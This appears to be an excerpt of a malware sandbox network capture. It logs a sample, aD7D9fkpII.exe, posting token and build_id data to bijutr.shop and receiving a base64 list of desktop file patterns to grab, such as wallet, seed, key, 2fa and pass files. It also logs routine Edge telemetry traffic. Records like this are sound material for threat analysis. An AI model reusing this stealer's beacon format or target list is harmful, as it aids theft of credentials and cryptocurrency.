                                                                                                                                                                                                                                                                        2024-12-27 07:20:52 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                        Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        35192.168.2.549930188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:53 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----IMGDJEKF37QIMYUKF3W4
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:53 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4d 47 44 4a 45 4b 46 33 37 51 49 4d 59 55 4b 46 33 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4d 47 44 4a 45 4b 46 33 37 51 49 4d 59 55 4b 46 33 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4d 47 44 4a 45 4b 46 33 37 51 49 4d 59 55 4b 46 33 57 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------IMGDJEKF37QIMYUKF3W4Content-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------IMGDJEKF37QIMYUKF3W4Content-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------IMGDJEKF37QIMYUKF3W4Cont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:54 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:20:54 UTC1588INData Raw: 36 32 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                        Data Ascii: 628REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        36192.168.2.549940188.245.216.2054435232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:56 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----89RQQIEKNGV37Y5FUKX4
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 1821
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:56 UTC1821OUTData Raw: 2d 2d 2d 2d 2d 2d 38 39 52 51 51 49 45 4b 4e 47 56 33 37 59 35 46 55 4b 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 38 39 52 51 51 49 45 4b 4e 47 56 33 37 59 35 46 55 4b 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 38 39 52 51 51 49 45 4b 4e 47 56 33 37 59 35 46 55 4b 58 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------89RQQIEKNGV37Y5FUKX4Content-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------89RQQIEKNGV37Y5FUKX4Content-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------89RQQIEKNGV37Y5FUKX4Cont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:56 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:20:57 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        37192.168.2.54994252.168.117.1704437500C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:57 UTC1071OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735284054576&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Content-Length: 11949
                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=2BA4C89BEAD6644B32BDDDF9EBCF652E; _EDGE_S=F=1&SID=2CAA7B291DCA69C1390F6E4B1C9F68D2; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                        2024-12-27 07:20:57 UTC11949OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 37 3a 32 30 3a 35 34 2e 35 37 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 33 65 38 38 66 61 62 32 2d 31 65 37 38 2d 34 65 32 32 2d 38 66 63 31 2d 31 37 63 39 35 34 39 61 39 61 64 33 22 2c 22 65 70 6f 63 68 22 3a 22 32 30 34 30 33 36 34 31 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T07:20:54.575Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"3e88fab2-1e78-4e22-8fc1-17c9549a9ad3","epoch":"204036419"},"app":{"locale"
                                                                                                                                                                                                                                                                        2024-12-27 07:20:58 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=36ec4e1c6d7e42109c8dd1ce20006504&HASH=36ec&LV=202412&V=4&LU=1735284058087; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 07:20:58 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                        Set-Cookie: MS0=4c9b48a2bd1b436bba78bb70914b246d; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 07:50:58 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                        time-delta-millis: 3511
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:57 GMT
                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        38192.168.2.54994152.168.117.1704437500C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:57 UTC1070OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735284054581&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Content-Length: 5219
                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=2BA4C89BEAD6644B32BDDDF9EBCF652E; _EDGE_S=F=1&SID=2CAA7B291DCA69C1390F6E4B1C9F68D2; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                        2024-12-27 07:20:57 UTC5219OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 37 3a 32 30 3a 35 34 2e 35 38 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 33 65 38 38 66 61 62 32 2d 31 65 37 38 2d 34 65 32 32 2d 38 66 63 31 2d 31 37 63 39 35 34 39 61 39 61 64 33 22 2c 22 65 70 6f 63 68 22 3a 22 32 30 34 30 33 36 34 31 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T07:20:54.580Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"3e88fab2-1e78-4e22-8fc1-17c9549a9ad3","epoch":"204036419"},"app":{"locale"
                                                                                                                                                                                                                                                                        2024-12-27 07:20:58 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=7a093b2960454bfba66fc27f4ac47c8c&HASH=7a09&LV=202412&V=4&LU=1735284057893; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 07:20:57 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                        Set-Cookie: MS0=5333676d38f94007ab91456ce7100d9d; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 07:50:57 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                        time-delta-millis: 3312
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:57 GMT
                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        39192.168.2.54994852.168.117.1704437500C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:58 UTC1060OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735284055450&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Content-Length: 5417
                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=2BA4C89BEAD6644B32BDDDF9EBCF652E; _EDGE_S=F=1&SID=2CAA7B291DCA69C1390F6E4B1C9F68D2; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                        2024-12-27 07:20:58 UTC5417OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 37 3a 32 30 3a 35 35 2e 34 34 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 33 65 38 38 66 61 62 32 2d 31 65 37 38 2d 34 65 32 32 2d 38 66 63 31 2d 31 37 63 39 35 34 39 61 39 61 64 33 22 2c 22 65 70 6f 63 68 22 3a 22 32 30 34 30 33 36 34 31 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T07:20:55.449Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"3e88fab2-1e78-4e22-8fc1-17c9549a9ad3","epoch":"204036419"},"app":{"locale"
                                                                                                                                                                                                                                                                        2024-12-27 07:20:58 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=14299ace0d154e2d9c4572c2f7ca057e&HASH=1429&LV=202412&V=4&LU=1735284058416; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 07:20:58 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                        Set-Cookie: MS0=a3c1a660c9174e6aacdc881c8175ea59; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 07:50:58 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                        time-delta-millis: 2966
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:57 GMT
                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        40192.168.2.54994952.168.117.1704437500C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:58 UTC1060OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735284055572&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Content-Length: 9876
                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=2BA4C89BEAD6644B32BDDDF9EBCF652E; _EDGE_S=F=1&SID=2CAA7B291DCA69C1390F6E4B1C9F68D2; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                        2024-12-27 07:20:58 UTC9876OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 37 3a 32 30 3a 35 35 2e 35 37 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 33 65 38 38 66 61 62 32 2d 31 65 37 38 2d 34 65 32 32 2d 38 66 63 31 2d 31 37 63 39 35 34 39 61 39 61 64 33 22 2c 22 65 70 6f 63 68 22 3a 22 32 30 34 30 33 36 34 31 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-27T07:20:55.570Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"3e88fab2-1e78-4e22-8fc1-17c9549a9ad3","epoch":"204036419"},"app":{"loca
                                                                                                                                                                                                                                                                        2024-12-27 07:20:58 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=b467fd1618144642a5dfcbcc732036cc&HASH=b467&LV=202412&V=4&LU=1735284058482; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 07:20:58 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                        Set-Cookie: MS0=58b3fe964a1a412f9a976b2652f2c71d; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 07:50:58 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                        time-delta-millis: 2910
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
